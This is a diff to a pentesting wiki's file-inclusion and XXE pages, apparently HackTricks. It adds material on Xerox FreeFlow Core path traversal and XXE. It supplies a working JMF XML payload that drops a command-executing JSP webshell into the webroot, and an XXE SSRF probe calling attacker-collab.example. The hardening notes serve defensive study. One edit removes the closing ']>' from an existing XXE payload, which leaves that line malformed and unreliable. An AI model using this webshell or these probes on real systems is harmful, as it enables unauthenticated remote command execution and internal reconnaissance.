Add content from: From Support Ticket to Zero Day

src/pentesting-web/file-inclusion/README.md

@@ -478,7 +478,55 @@ For the technical details check the mentioned post!
 
 ## LFI2RCE
 
-### Remote File Inclusion
+### Arbitrary File Write via Path Traversal (Webshell RCE)
+
+When server-side code that ingests/uploads files builds the destination path using user-controlled data (e.g., a filename or URL) without canonicalising and validating it, `..` segments and absolute paths can escape the intended directory and cause an arbitrary file write. If you can place the payload under a web-exposed directory, you usually get unauthenticated RCE by dropping a webshell.
+
+Typical exploitation workflow:
+- Identify a write primitive in an endpoint or background worker that accepts a path/filename and writes content to disk (e.g., message-driven ingestion, XML/JSON command handlers, ZIP extractors, etc.).
+- Determine web-exposed directories. Common examples:
+  - Apache/PHP: `/var/www/html/`
+  - Tomcat/Jetty: `<tomcat>/webapps/ROOT/` → drop `shell.jsp`
+  - IIS: `C:\inetpub\wwwroot\` → drop `shell.aspx`
+- Craft a traversal path that breaks out of the intended storage directory into the webroot, and include your webshell content.
+- Browse to the dropped payload and execute commands.
+
+Notes:
+- The vulnerable service that performs the write may listen on a non-HTTP port (e.g., a JMF XML listener on TCP 4004). The main web portal (different port) will later serve your payload.
+- On Java stacks, these file writes are often implemented with simple `File`/`Paths` concatenation. Lack of canonicalisation/allow-listing is the core flaw.
+
+Generic XML/JMF-style example (product schemas vary – the DOCTYPE/body wrapper is irrelevant for the traversal):
+
+```xml
+<?xml version="1.0" encoding="UTF-8"?>
+<JMF SenderID="hacktricks" Version="1.3">
+  <Command Type="SubmitQueueEntry">
+    <!-- Write outside the intake folder into the webroot via traversal -->
+    <Resource Name="FileName">../../../webapps/ROOT/shell.jsp</Resource>
+    <Data>
+      <![CDATA[
+      <%@ page import="java.io.*" %>
+      <%
+        String c = request.getParameter("cmd");
+        if (c != null) {
+          Process p = Runtime.getRuntime().exec(c);
+          try (var in = p.getInputStream(); var out = response.getOutputStream()) {
+            in.transferTo(out);
+          }
+        }
+      %>
+      ]]>
+    </Data>
+  </Command>
+</JMF>
+```
+
+Hardening that defeats this class of bugs:
+- Resolve to a canonical path and enforce it is a descendant of an allow-listed base directory.
+- Reject any path containing `..`, absolute roots, or drive letters; prefer generated filenames.
+- Run the writer as a low-privileged account and segregate write directories from served roots.
+
+## Remote File Inclusion
 
 Explained previously, [**follow this link**](#remote-file-inclusion).
 
@@ -689,6 +737,8 @@ _Even if you cause a PHP Fatal Error, PHP temporary files uploaded are deleted._
 
 - [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal)
 - [PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal/Intruders](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal/Intruders)
+- [Horizon3.ai – From Support Ticket to Zero Day (FreeFlow Core path traversal → arbitrary write → webshell)](https://horizon3.ai/attack-research/attack-blogs/from-support-ticket-to-zero-day/)
+- [Xerox Security Bulletin 025-013 – FreeFlow Core 8.0.5](https://securitydocs.business.xerox.com/wp-content/uploads/2025/08/Xerox-Security-Bulletin-025-013-for-Freeflow-Core-8.0.5.pdf)
 
 {{#file}}
 EN-Local-File-Inclusion-1.pdf

src/pentesting-web/xxe-xee-xml-external-entity.md

@@ -77,7 +77,7 @@ In **Java** based applications it might be possible to **list the contents of a
 
 ```xml
 <!-- Root / -->
-<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE aa[<!ELEMENT bb ANY><!ENTITY xxe SYSTEM "file:///">]><root><foo>&xxe;</foo></root>
+<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE aa[<!ELEMENT bb ANY><!ENTITY xxe SYSTEM "file:///"><root><foo>&xxe;</foo></root>
 
 <!-- /etc/ -->
 <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root[<!ENTITY xxe SYSTEM "file:///etc/" >]><root><foo>&xxe;</foo></root>
@@ -168,7 +168,7 @@ _**Please notice that external DTD allows us to include one entity inside the se
 
 ### **Error Based (system DTD)**
 
-So what about blind XXE vulnerabilities when **out-of-band interactions are blocked** (external connections aren't available)?.
+So what about blind XXE vulnerabilities when **out-of-band interactions are blocked** (external connections aren't available)?
 
 A loophole in the XML language specification can **expose sensitive data through error messages when a document's DTD blends internal and external declarations**. This issue allows for the internal redefinition of entities declared externally, facilitating the execution of error-based XXE attacks. Such attacks exploit the redefinition of an XML parameter entity, originally declared in an external DTD, from within an internal DTD. When out-of-band connections are blocked by the server, attackers must rely on local DTD files to conduct the attack, aiming to induce a parsing error to reveal sensitive information.
 
@@ -867,6 +867,34 @@ If the application must support DTDs internally, keep `disallow-doctype-decl` di
 
 Real-world case study: **CVE-2025-27136** in the Java S3 emulator *LocalS3* used the vulnerable constructor shown above.  An unauthenticated attacker could supply a crafted XML body to the `CreateBucketConfiguration` endpoint and have the server embed local files (for example `/etc/passwd`) in the HTTP response.
 
+### XXE in JMF/Print Orchestration Services → SSRF
+
+Some print workflow/orchestration platforms expose a network-facing Job Messaging Format (JMF) listener that accepts XML over TCP. If the underlying parser accepts a `DOCTYPE` and resolves external entities, you can leverage a classical XXE to force the server to make outbound requests (SSRF) or access local resources.
+
+Key points observed in the wild:
+- Network listener (e.g., JMF client) on a dedicated port (commonly 4004 in Xerox FreeFlow Core).
+- Java-based XML parsing inside a jar (e.g., `jmfclient.jar`) without `disallow-doctype-decl` or entity resolution disabled.
+- Out-of-band callbacks reliably confirm exploitation.
+
+Minimal JMF-style SSRF probe (structure varies by product but the DOCTYPE is what matters):
+
+```xml
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE JMF [
+  <!ENTITY probe SYSTEM "http://attacker-collab.example/oob">  
+]>
+<JMF SenderID="hacktricks" Version="1.3" TimeStamp="2025-08-13T10:10:10Z">
+  <Query Type="KnownMessages">&probe;</Query>
+</JMF>
+```
+
+Notes:
+- Replace the entity URL with your collaborator. If SSRF is possible the server will resolve it while parsing the message.
+- Hardenings to look for: `disallow-doctype-decl=true`, `external-general-entities=false`, `external-parameter-entities=false`.
+- Even when the JMF port does not serve files, SSRF can be chained for internal recon or to reach management APIs bound to localhost.
+
+References for this vector are listed at the end of the page.
+
 ## References
 
 - [OffSec Blog – CVE-2025-27136 LocalS3 XXE](https://www.offsec.com/blog/cve-2025-27136/)
@@ -882,6 +910,8 @@ Real-world case study: **CVE-2025-27136** in the Java S3 emulator *LocalS3* used
 
 - [Dojo CTF Challenge #42 – Hex Color Palette XXE write-up](https://www.yeswehack.com/dojo/dojo-ctf-challenge-winners-42)
 - [lxml bug #2107279 – Parameter-entity XXE still possible](https://bugs.launchpad.net/lxml/+bug/2107279)
+- [Horizon3.ai – From Support Ticket to Zero Day (FreeFlow Core XXE/SSRF + Path Traversal)](https://horizon3.ai/attack-research/attack-blogs/from-support-ticket-to-zero-day/)
+- [Xerox FreeFlow Core Security Guide (architecture/ports)](https://securitydocs.business.xerox.com/wp-content/uploads/2025/03/Security-Guide-Information-Assurance-Disclosure-Xerox-FreeFlow-Core-8.0.pdf)
+- [Xerox Security Bulletin 025-013 – FreeFlow Core 8.0.5](https://securitydocs.business.xerox.com/wp-content/uploads/2025/08/Xerox-Security-Bulletin-025-013-for-Freeflow-Core-8.0.5.pdf)
 
 {{#include ../banners/hacktricks-training.md}}
-